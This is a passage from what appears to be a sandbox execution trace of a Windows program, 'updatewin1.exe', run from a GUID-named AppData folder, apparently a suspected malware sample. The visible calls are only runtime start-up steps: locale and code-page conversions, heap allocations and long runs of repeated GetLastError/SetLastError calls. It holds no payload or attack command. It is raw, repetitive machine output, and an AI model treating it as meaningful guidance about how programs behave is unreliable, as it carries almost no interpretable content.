lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0045.377] FreeEnvironmentStringsW (penv=0x314e78) returned 1 [0045.377] GetLastError () returned 0x0 [0045.377] SetLastError (dwErrCode=0x0) [0045.377] GetLastError () returned 0x0 [0045.377] SetLastError (dwErrCode=0x0) [0045.377] GetLastError () returned 0x0 [0045.377] SetLastError (dwErrCode=0x0) [0045.377] GetACP () returned 0x4e4 [0045.377] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x220) returned 0x5a1768 [0045.377] GetLastError () returned 0x0 [0045.377] SetLastError (dwErrCode=0x0) [0045.377] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.377] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0045.377] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0045.377] GetLastError () returned 0x0 [0045.378] SetLastError (dwErrCode=0x0) [0045.378] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0045.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.378] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0045.378] GetLastError () returned 0x0 [0045.378] SetLastError (dwErrCode=0x0) [0045.378] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0045.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ忶켎㞕AĀ") returned 256 [0045.378] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ忶켎㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0045.378] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ忶켎㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84°\x12Ã\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.378] GetLastError () returned 0x0 [0045.378] SetLastError (dwErrCode=0x0) [0045.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.378] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ忶켎㞕AĀ") returned 256 [0045.378] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ忶켎㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0045.378] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ忶켎㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0045.378] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x84°\x12Ã\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0045.378] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin1.exe")) returned 0x5f [0045.378] GetLastError () returned 0x0 [0045.378] SetLastError (dwErrCode=0x0) [0045.378] GetLastError () returned 0x0 [0045.378] SetLastError (dwErrCode=0x0) [0045.378] GetLastError () returned 0x0 [0045.378] SetLastError (dwErrCode=0x0) [0045.378] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.379] SetLastError (dwErrCode=0x0) [0045.379] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.380] SetLastError (dwErrCode=0x0) [0045.380] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.381] SetLastError (dwErrCode=0x0) [0045.381] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.382] SetLastError (dwErrCode=0x0) [0045.382] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.383] SetLastError (dwErrCode=0x0) [0045.383] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.384] GetLastError () returned 0x0 [0045.384] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.385] GetLastError () returned 0x0 [0045.385] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x74) returned 0x5a1990 [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.386] GetLastError () returned 0x0 [0045.386] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.387] SetLastError (dwErrCode=0x0) [0045.387] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] SetLastError (dwErrCode=0x0) [0045.388] GetLastError () returned 0x0 [0045.388] 